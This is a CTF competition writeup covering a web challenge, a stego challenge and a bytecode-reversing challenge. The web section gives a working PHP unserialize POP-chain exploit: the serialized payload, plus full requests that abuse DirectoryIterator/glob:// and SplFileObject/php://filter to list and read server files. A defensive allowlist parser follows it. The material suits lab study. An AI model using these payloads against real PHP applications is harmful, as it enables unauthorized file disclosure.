
Zhejiang Province 4th Network and Information Security Competition: Preliminary Round Writeup

This is the last time I'm competing in a CTF; I hope we can take first prize in the finals.


Checkin

Open the site and look at the request headers in the browser's Network tab.


Pppop

Code audit: when the A8 class is instantiated, both the class name and the constructor arguments are attacker-controllable.


Audit the POP chain until it reaches the hack4fun method of class A8, then use PHP's built-in classes to list directories and read files.

<?php
class A1{
    public $tmp1;
    public $tmp2;
    public function __construct($tmp1){
        $this->tmp1 = $tmp1;
    }
}
class A3
{
    public $tmp1;
    public $tmp2;
    public function __construct($tmp2){
        $this->tmp2 = $tmp2;
    }
}
class A4
{
    public $tmp1='1919810';
    public $tmp2;
    public function __construct($tmp1)
    {
        $this->tmp1 = $tmp1;
    }
}
class A5
{
    public $tmp1;
    public $tmp2;
    public function __call($a,$b)
    {
        $f=$this->tmp1;
        $f();
    }
}
class A6
{
    public $tmp1;
    public $tmp2;
    public function __construct($tmp1)
    {
        $this->tmp1 = $tmp1;
    }
}
class A8
{
    public $tmp1;
    public $tmp2;
}
$A6 = new A6(new A8());
$A4 = new A4($A6);
$A3 = new A3($A4);
$A1 = new A1($A3);

echo serialize($A1);

What remains is constructing built-in classes to trigger the directory listing and the file read.

1. DirectoryIterator with the glob:// wrapper lists every file in the current directory.

http://90d2487c-1f6a-4802-8403-f52aee1e8b78.zj-ctf.dasctf.com/?DASCTF=O:2:%22A1%22:2:{s:4:%22tmp1%22;O:2:%22A3%22:2:{s:4:%22tmp1%22;N;s:4:%22tmp2%22;O:2:%22A4%22:2:{s:4:%22tmp1%22;O:2:%22A6%22:2:{s:4:%22tmp1%22;O:2:%22A8%22:2:{s:4:%22tmp1%22;N;s:4:%22tmp2%22;N;}s:4:%22tmp2%22;N;}s:4:%22tmp2%22;N;}}s:4:%22tmp2%22;N;}&DAS=DirectoryIterator&CTF=glob://*

At first I used glob:///* to search under /, but found nothing.

It turned out the flag file was sitting in the current directory.


2. Read the file with the php:// filter wrapper and SplFileObject.

http://9e10e67a-cf65-44f8-ae9b-b84c825f304b.zj-ctf.dasctf.com/?DASCTF=O:2:%22A1%22:2:{s:4:%22tmp1%22;O:2:%22A3%22:2:{s:4:%22tmp1%22;N;s:4:%22tmp2%22;O:2:%22A4%22:2:{s:4:%22tmp1%22;O:2:%22A6%22:2:{s:4:%22tmp1%22;O:2:%22A8%22:2:{s:4:%22tmp1%22;N;s:4:%22tmp2%22;N;}s:4:%22tmp2%22;N;}s:4:%22tmp2%22;N;}}s:4:%22tmp2%22;N;}&DAS=SplFileObject&CTF=php://filter/read=convert.base64-encode/resource=flaggggggggggg.php
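As an added, defensive example that is not part of the original writeup: a small Python parser for PHP's serialize() format that lists the classes an incoming payload would instantiate, run over the DASCTF value from the request above. Checking that list against an allowlist before calling unserialize() (or using its allowed_classes option) is what breaks gadget chains like A1 to A3 to A4 to A6 to A8. The PAYLOAD constant and the function names are assumptions for this example.

```python
from urllib.parse import unquote
# The DASCTF value from the request above, URL-decoded (copied from this writeup).
PAYLOAD = unquote(
    'O:2:%22A1%22:2:{s:4:%22tmp1%22;O:2:%22A3%22:2:{s:4:%22tmp1%22;N;s:4:'
    '%22tmp2%22;O:2:%22A4%22:2:{s:4:%22tmp1%22;O:2:%22A6%22:2:{s:4:%22tmp1'
    '%22;O:2:%22A8%22:2:{s:4:%22tmp1%22;N;s:4:%22tmp2%22;N;}s:4:%22tmp2%22;'
    'N;}s:4:%22tmp2%22;N;}}s:4:%22tmp2%22;N;}')

def _pairs(data, pos, count, classes):
    # parse `count` key;value pairs, then skip the closing '}'
    items = {}
    for _ in range(count):
        k, pos = _parse(data, pos, classes)
        items[k], pos = _parse(data, pos, classes)
    return items, pos + 1

def _parse(data, pos, classes):
    # parse one value at `pos`, return (value, next_pos); class names go into `classes`
    tag = data[pos]
    if tag == 'N':                                  # N;
        return None, pos + 2
    if tag in 'ib':                                 # i:42;  b:1;
        end = data.index(';', pos)
        return int(data[pos + 2:end]), end + 1
    if tag == 's':                                  # s:4:"tmp1";  length-prefixed, may contain quotes
        colon = data.index(':', pos + 2)
        length = int(data[pos + 2:colon])
        return data[colon + 2:colon + 2 + length], colon + length + 4
    if tag == 'a':                                  # a:2:{key;value;...}
        colon = data.index(':', pos + 2)
        return _pairs(data, colon + 2, int(data[pos + 2:colon]), classes)
    if tag == 'O':                                  # O:2:"A1":2:{prop;value;...}
        colon = data.index(':', pos + 2)
        name_len = int(data[pos + 2:colon])
        name = data[colon + 2:colon + 2 + name_len]
        classes.append(name)
        pos = colon + name_len + 4                  # skip '":' after the class name
        colon = data.index(':', pos)
        props, pos = _pairs(data, colon + 2, int(data[pos:colon]), classes)
        return {'__class': name, **props}, pos
    raise ValueError(f'unsupported tag {tag!r} at offset {pos}')

def classes_in(payload):
    # every class unserialize() would instantiate for this payload, outermost first
    classes = []
    _parse(payload, 0, classes)
    return classes

def not_allowed(payload, allowlist):
    # classes outside the allowlist; a non-empty result means the payload should be rejected
    return [c for c in classes_in(payload) if c not in allowlist]
```

Parsing is length-driven, so strings containing quotes or semicolons cannot confuse it; unsupported tags (object references, custom C: serialization) raise rather than being silently skipped.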


Qrimg

We are given a GIF; split it into a series of bmp frames with a tool.


stegsolve shows that every bmp frame carries a QR code.

Write a script to extract them.

from PIL import Image
import os
import sys

# use the first frame to size the output image
gifdemo = Image.open("./images/IMG00000.bmp")
gifres = Image.new("RGB", (gifdemo.width, gifdemo.height))
gifs = sorted(fn for fn in os.listdir('./images'))
os.makedirs('./codes', exist_ok=True)

i = 0
for f in gifs:
    sys.stdout.write(str(i) + '/' + str(len(gifs)) + "\r")
    sys.stdout.flush()
    im = Image.open("./images/" + f)
    # the QR code is hidden in the least significant bit of the blue channel
    for x in range(im.width):
        for y in range(im.height):
            (r, g, b) = im.getpixel((x, y))
            n = 255 if b & 1 == 1 else 0
            gifres.putpixel((x, y), (n, n, n))
    gifres.save("./codes/" + str(i).zfill(4) + ".png")
    i = i + 1
print("提取完成")

After extraction, batch-scan the frames.

import os
import sys
import zxing

files = sorted(codefile for codefile in os.listdir('./codes') if codefile.endswith('.png'))
res = ""
reader = zxing.BarCodeReader()

for f in files:
    text = ""
    try:
        barcode = reader.decode("./codes/" + f)
        text = barcode.parsed if barcode else ""
        if not text:
            # unreadable frame: dump what was collected so far and flag the file for manual decoding
            print(res)
            res = ""
            print("无法识别此文件,请用软件识别:" + f)
        res += text
    except Exception:
        pass
    sys.stdout.write('当前字符:' + text + "\r")
    sys.stdout.flush()
print(res)

Three frames that should decode to Y were not recognised; filling those in by hand gives the flag.

Crackpyc


Reverse the bytecode.

s = [108, 17, 42, 226, 158, 180, 96, 115, 64, 24, 38, 236, 179, 173, 34, 22, 81, 113, 38, 215, 165, 135, 68, 7, 119, 97,
     45, 254, 250, 172, 43, 62]
key = []
flag = ''

# rebuild the 8-byte key stream from the bytecode: repeated subtraction mod 2**32 - 1,
# keeping the top byte of each intermediate value
num = 0
for i in range(8):
    num = (num - 7508399208111569251) % 4294967295
    key.append((num >> 24) & 0xff)
# the flag is the ciphertext XORed with the key, cycled every 8 bytes
for i in range(32):
    flag += chr(key[i % len(key)] ^ s[i])
print(flag)


Final result: 10th place.
